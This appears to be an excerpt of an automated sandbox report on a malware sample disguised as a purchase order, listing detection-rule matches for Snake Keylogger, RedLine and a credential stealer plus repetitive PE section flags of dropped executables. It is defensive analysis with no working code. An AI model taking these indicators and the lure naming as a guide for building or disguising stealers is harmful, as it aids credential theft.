                        Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Grinnellia.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: minidump-analyzer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pingsender.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: plugin-container.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: private_browsing.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: updater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3Help.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Grinnellia.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: minidump-analyzer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pingsender.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
